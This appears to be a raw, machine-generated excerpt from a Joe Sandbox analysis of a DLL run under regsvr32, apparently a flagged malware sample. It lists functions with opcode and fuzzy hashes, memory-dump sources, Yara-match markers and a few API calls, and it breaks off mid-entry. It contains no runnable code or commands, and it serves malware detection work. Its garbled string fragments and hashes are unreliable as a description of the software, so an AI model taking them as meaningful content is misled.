                                                                      • String ID: 6|$6`d$H~z
                                                                      • API String ID: 0-1702722476
                                                                      • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                      • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                      • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                      • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d~$`5$t>
                                                                      • API String ID: 0-1282322184
                                                                      • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                      • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                      • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                      • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #St$JYr$hmn
                                                                      • API String ID: 0-1556749129
                                                                      • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                      • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                      • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                      • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TGA$K$W}
                                                                      • API String ID: 0-588348707
                                                                      • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                      • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                      • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                      • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :1,$@H${C=
                                                                      • API String ID: 0-2737386091
                                                                      • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                      • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                      • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                      • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: prP$q<C$uL
                                                                      • API String ID: 0-1414207395
                                                                      • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                      • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                      • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                      • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :00D$Kl$(R'
                                                                      • API String ID: 0-3661897330
                                                                      • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                      • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                      • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                      • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _getptd.LIBCMT ref: 00007FFA526A597E
                                                                        • Part of subcall function 00007FFA526A6550: RtlCaptureContext.KERNEL32 ref: 00007FFA526A658F
                                                                        • Part of subcall function 00007FFA526A6550: IsDebuggerPresent.KERNEL32 ref: 00007FFA526A662D
                                                                        • Part of subcall function 00007FFA526A6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6637
                                                                        • Part of subcall function 00007FFA526A6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6642
                                                                        • Part of subcall function 00007FFA526A6550: GetCurrentProcess.KERNEL32 ref: 00007FFA526A6658
                                                                        • Part of subcall function 00007FFA526A6550: TerminateProcess.KERNEL32 ref: 00007FFA526A6666
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                      • String ID: C
                                                                      • API String ID: 1583075380-1037565863
                                                                      • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                      • Instruction ID: 131493ad0b0fa91b386578bd89b44f5d94a144b1755a46de2974253967e6ad1d
                                                                      • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                      • Instruction Fuzzy Hash: 1E516252F1968281EA60DB22AD617BA56D0FB86B84F4CC031EE4E47E8DDFBDE045D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale_getptd
                                                                      • String ID:
                                                                      • API String ID: 3731964398-0
                                                                      • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                      • Instruction ID: 8cb64079d0ced8664367daa7a599203c12a45dbd6fd590c8603d6837030bcc39
                                                                      • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                      • Instruction Fuzzy Hash: 60218733B08682C6EB689B25DD553EA73E0FB8A745F088131C65D87A89DFBCE4649600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale_getptd
                                                                      • String ID:
                                                                      • API String ID: 3731964398-0
                                                                      • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                      • Instruction ID: 21c6dabd50465675e2da0ff3d008abc21d50858ffec39cd86ccca986fd8d347a
                                                                      • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                      • Instruction Fuzzy Hash: B9217F32B08681D6DB28CB65D8553AA73E0FB8AB80F488135DA5D87B58CF7CE554C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$Y}
                                                                      • API String ID: 0-941771097
                                                                      • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                      • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                      • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                      • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7;}~$?C
                                                                      • API String ID: 0-2633536567
                                                                      • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                      • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                      • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                      • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5"*$Wu
                                                                      • API String ID: 0-3407213400
                                                                      • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                      • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                      • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                      • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: F/|$]M
                                                                      • API String ID: 0-4182351379
                                                                      • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                      • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                      • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                      • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;SH$nK
                                                                      • API String ID: 0-1681473137
                                                                      • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                      • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                      • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                      • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$z
                                                                      • API String ID: 0-3532108746
                                                                      • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                      • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                      • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                      • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g/?$~l;
                                                                      • API String ID: 0-1448562259
                                                                      • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                      • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                      • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                      • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: JM$S
                                                                      • API String ID: 0-422059844
                                                                      • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                      • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                      • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                      • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \4t$sT>
                                                                      • API String ID: 0-514966222
                                                                      • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                      • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                      • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                      • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6 zT$lh
                                                                      • API String ID: 0-3667112246
                                                                      • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                      • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                      • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                      • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2Q'$t<p
                                                                      • API String ID: 0-2959822804
                                                                      • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                      • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                      • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                      • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 95s$\`s
                                                                      • API String ID: 0-3495284040
                                                                      • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                      • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                      • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                      • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3*$qMu
                                                                      • API String ID: 0-4093015089
                                                                      • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                      • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                      • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                      • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$"n&E
                                                                      • API String ID: 0-1188898577
                                                                      • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                      • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                      • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                      • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Bw~$fy
                                                                      • API String ID: 0-1663007907
                                                                      • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                      • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                      • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                      • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /0$XyLe
                                                                      • API String ID: 0-3562702181
                                                                      • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                      • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                      • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                      • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >I$>I
                                                                      • API String ID: 0-3948471910
                                                                      • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                      • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                      • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                      • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %'#$'1O"
                                                                      • API String ID: 0-3508158491
                                                                      • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                      • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                      • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                      • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
